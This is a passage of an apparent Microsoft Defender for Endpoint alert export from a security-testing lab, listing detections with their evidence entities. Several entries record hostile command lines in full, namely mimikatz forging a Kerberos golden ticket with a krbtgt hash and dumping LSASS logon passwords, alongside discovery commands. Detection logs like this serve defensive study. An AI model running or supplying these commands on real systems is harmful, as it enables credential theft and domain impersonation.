"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "1521f019fe55cffe753941d0fb207004db26ea8f",
"sha256": null,
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-18",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": null,
"deviceId": null,
"domainName": null,
"entityType": "File",
"evidenceCreationTime": "2022-11-16T16:01:04.1333333Z",
"fileName": "WaAppAgent.exe",
"filePath": "C:\\WindowsAzure\\GuestAgent_2.7.41491.1071_2022-10-12_040513",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "1521f019fe55cffe753941d0fb207004db26ea8f",
"sha256": null,
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Clean"
},
{
"aadUserId": null,
"accountName": "system",
"detectionStatus": null,
"deviceId": null,
"domainName": null,
"entityType": "User",
"evidenceCreationTime": "2022-11-16T16:01:04.1333333Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-18",
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-11-11T08:20:15.4333333Z | Suspicious | None | jeff | rnd.local | S-1-5-21-2300221942-1987151257-321556088-1104 | e848b07a-87af-4448-9979-09f0b809c8d4 | jeff@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
da638045932869405772_-745641302 | e8cc923b-7240-462d-967e-3c399c11cfc7 | 765 | MicrosoftDefenderForEndpoint | 2022-11-21T02:08:06.9406021Z | 2022-11-21T02:08:07.48Z | null | 2022-11-21T02:06:56.8448435Z | 2022-11-21T02:06:56.8448435Z | Malicious credential theft tool execution detected | A known credential theft tool execution command line was detected.
Either the process itself or its command line indicated an intent to dump users' credentials, keys, plain-text passwords and more. | CredentialAccess | New | High | null | UnsupportedAlertType | null | null | WindowsDefenderAtp | f5d3c5d8-ec3a-4412-ab45-934d8faff42c | null | null | null | [
"T1003"
] | [
{
"aadDeviceId": null,
"defenderAvStatus": "Updated",
"deviceDnsName": "msdxv2-win10v.msdxv2.m365dpoc.com",
"firstSeen": "2022-08-08T08:51:02.455Z",
"healthStatus": "Active",
"loggedOnUsers": [
{
"accountName": "jeff",
"domainName": "MSDXV2"
}
],
"mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"onboardingStatus": "Onboarded",
"osBuild": 17763,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "Full Auto Clients",
"riskScore": "Critical",
"tags": [
"Full auto"
],
"version": "1809",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0"
}
}
] | [
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": null,
"deviceId": null,
"domainName": "msdxv2.m365dpoc",
"entityType": "User",
"evidenceCreationTime": "2022-11-21T02:08:06.97Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:08:06.97Z",
"fileName": "mimikatz.exe",
"filePath": "C:\\M365DAttack\\Mimikatz\\x64",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "\\Device\\HarddiskVolume4\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 11068,
"processCommandLine": "\"mimikatz.exe\" privilege::debug \"kerberos::golden /domain:msdxv2.m365dpoc.com /sid:S-1-5-21-1296854425-3029985372-4181197820 /krbtgt:334c5cf2bab300e3e456e328f5c699d3 /user:Steve /ticket:C:\\M365DAttack\\Admin-Tickets\\ticket.kirbi /ptt\" exit",
"processCreationTime": "2022-11-21T02:06:53.9715954Z",
"processId": 6948,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "70df765f554ed7392200422c18776b8992c09231",
"sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-12-22T08:59:44.0733333Z | Suspicious | None | Defender | rnd.local | S-1-5-21-2159906967-4174806019-1002223092-500 | null | Defender@msdxv8.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | Process | 2022-12-22T08:50:36.4033333Z | Suspicious | None | admin | MSDXV8 | S-1-5-21-2159906967-4174806019-1002223092-1104 | null | jeff@msdxv8.m365dpoc.com | 6cbce4a295c163791b60fc23d285e6d84f28ee4c | de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c | powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0 | 6,324 | "powershell.exe" -noexit -command Set-Location -literalPath 'C:\Users\jeff\Desktop' | 2022-12-22T08:47:11.8139068Z | 1,896 | 2022-12-22T08:26:24.0772409Z | explorer.exe | C:\Windows | Detected | 7ba8aa008687dd62d639cb45b52c7c9f971c65c1 |
da638045930235785637_-1560714689 | 6481deaa-0e5d-4035-a417-a8d15b86e3d0 | 765 | MicrosoftDefenderForEndpoint | 2022-11-21T02:03:43.5785844Z | 2022-11-21T02:03:55.99Z | null | 2022-11-21T01:57:48.8157309Z | 2022-11-21T02:01:39.4913383Z | Suspicious System Network Configuration Discovery | A known tool or technique was used to gather information on this device. Attackers might be trying to gather information about the target device or network for later attacks. | Discovery | New | Low | null | UnsupportedAlertType | null | null | WindowsDefenderAtp | 9bfe28a9-21eb-4f8a-b51e-38ebd3650c88 | null | null | null | [
"T1016"
] | [
{
"aadDeviceId": null,
"defenderAvStatus": "Updated",
"deviceDnsName": "staging.net",
"firstSeen": "2022-08-08T08:51:02.455Z",
"healthStatus": "Active",
"loggedOnUsers": [
{
"accountName": "jeff",
"domainName": "MSDXV2"
}
],
"mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"onboardingStatus": "Onboarded",
"osBuild": 17763,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "Full Auto Clients",
"riskScore": "High",
"tags": [
"Full auto"
],
"version": "1809",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0"
}
}
] | [
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": null,
"deviceId": null,
"domainName": "msdxv2.m365dpoc",
"entityType": "User",
"evidenceCreationTime": "2022-11-21T02:03:43.66Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:03:43.66Z",
"fileName": "nslookup.exe",
"filePath": "C:\\Windows\\System32",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-21T02:01:37.5336889Z",
"parentProcessFileName": "cmd.exe",
"parentProcessFilePath": "C:\\Windows\\System32",
"parentProcessId": 728,
"processCommandLine": "nslookup msdxv2-dc.msdxv2.m365dpoc.com",
"processCreationTime": "2022-11-21T02:01:37.5530608Z",
"processId": 1716,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "9a3be34e8316ebb945a4d5818a4066c91fe98c95",
"sha256": "54daf167f8dbe7fe0f23b37a600bd8d9d16b756d3b83f0804b5037cbbe895eb6",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:03:43.66Z",
"fileName": "cmd.exe",
"filePath": "C:\\Windows\\System32",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 11068,
"processCommandLine": "\"cmd.exe\" /c \"nslookup msdxv2-dc.msdxv2.m365dpoc.com\"",
"processCreationTime": "2022-11-21T02:01:37.5336889Z",
"processId": 728,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "ded8fd7f36417f66eb6ada10e0c0d7c0022986e9",
"sha256": "bc866cfcdda37e24dc2634dc282c7a0e6f55209da17a8fa105b07414c0e7c527",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:03:45.1233333Z",
"fileName": "powershell.exe",
"filePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-10T07:07:26.0872385Z",
"parentProcessFileName": "explorer.exe",
"parentProcessFilePath": "C:\\Windows",
"parentProcessId": 4680,
"processCommandLine": "\"powershell.exe\" -noexit -command Set-Location -literalPath 'C:\\Users\\jeff\\Downloads'",
"processCreationTime": "2022-11-21T02:01:28.4753286Z",
"processId": 11068,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "6cbce4a295c163791b60fc23d285e6d84f28ee4c",
"sha256": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:03:45.1233333Z",
"fileName": "explorer.exe",
"filePath": "C:\\Windows",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-10T07:07:25.9825113Z",
"parentProcessFileName": "userinit.exe",
"parentProcessFilePath": null,
"parentProcessId": 4684,
"processCommandLine": "Explorer.EXE",
"processCreationTime": "2022-11-10T07:07:26.0872385Z",
"processId": 4680,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "56d2d9f6c4b44cfedcf71a86ed68cd859e5c692d",
"sha256": "8c75757111b8bc8bd0730fabe3c99f73f08169dfd54ed6a64dcf983dc53fec4b",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
da638037518549951922_-2044684283 | e46fcd28-d937-4252-b10a-91c5292c21d0 | 686 | MicrosoftDefenderForEndpoint | 2022-11-11T08:24:14.995216Z | 2022-11-12T01:35:43.1766667Z | 2022-11-12T01:35:42.84Z | 2022-11-11T08:21:30.0941332Z | 2022-11-11T08:21:30.0941332Z | Password hashes dumped from LSASS memory | LSASS process memory has been read to obtain password hashes, indicating possible credential theft. Attackers can use hashes obtained from LSASS process memory to impersonate or perform actions on behalf of logged on or recently logged on users. | CredentialAccess | Resolved | Medium | null | UnsupportedAlertType | TruePositive | SecurityTesting | WindowsDefenderAtp | 2ed33edd-2c33-49fd-877b-ab73fba14d59 | takeshi@msdxv2.m365dpoc.com | null | null | [
"T1003",
"T1003.001"
] | [
{
"aadDeviceId": null,
"defenderAvStatus": "Updated",
"deviceDnsName": "msdxv2-win10v.msdxv2.m365dpoc.com",
"firstSeen": "2022-08-08T08:51:02.455Z",
"healthStatus": "Active",
"loggedOnUsers": [
{
"accountName": "jeff",
"domainName": "MSDXV2"
}
],
"mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"onboardingStatus": "Onboarded",
"osBuild": 17763,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "Full Auto Clients",
"riskScore": "Medium",
"tags": [
"Full auto"
],
"version": "1809",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0"
}
}
] | [
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": null,
"deviceId": null,
"domainName": "msdxv2.m365dpoc",
"entityType": "User",
"evidenceCreationTime": "2022-11-11T08:24:15.04Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-11T08:24:15.04Z",
"fileName": "mimikatz.exe",
"filePath": "C:\\M365DAttack\\Mimikatz\\x64",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-11T08:16:44.2952776Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "\\Device\\HarddiskVolume4\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 4704,
"processCommandLine": "\"mimikatz.exe\" privilege::debug sekurlsa::logonpasswords exit",
"processCreationTime": "2022-11-11T08:17:06.3382251Z",
"processId": 6044,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "70df765f554ed7392200422c18776b8992c09231",
"sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "SYSTEM",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "NT AUTHORITY",
"entityType": "Process",
"evidenceCreationTime": "2022-11-11T08:24:15.04Z",
"fileName": "lsass.exe",
"filePath": "C:\\Windows\\System32",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-10T07:06:09.0096674Z",
"parentProcessFileName": "wininit.exe",
"parentProcessFilePath": "\\Device\\HarddiskVolume4\\Windows\\System32",
"parentProcessId": 532,
"processCommandLine": "lsass.exe",
"processCreationTime": "2022-11-10T07:06:09.0866649Z",
"processId": 624,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "0fb26350106c9bdd196d4e7d01eb30007663687c",
"sha256": "bbc83e4759d4b82bad31e371ad679aa414c72273bf97cee5aed8337ed8a4d79f",
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-18",
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | Process | 2022-11-18T05:12:05.62Z | Suspicious | Active | SYSTEM | NT AUTHORITY | S-1-5-18 | null | null | f309b61a8b005b5ce0a3fb58caaa798cfc95f5db | 3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748 | PSEXESVC.exe | C:\Windows | 7,708 | type secret.txt | 2022-11-18T05:09:53.2034539Z | 620 | 2022-11-16T03:32:19.0279725Z | services.exe | C:\Windows\System32 | Detected | 36150b3c1b69b5c2da9df4efd86ac6c166924a48 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.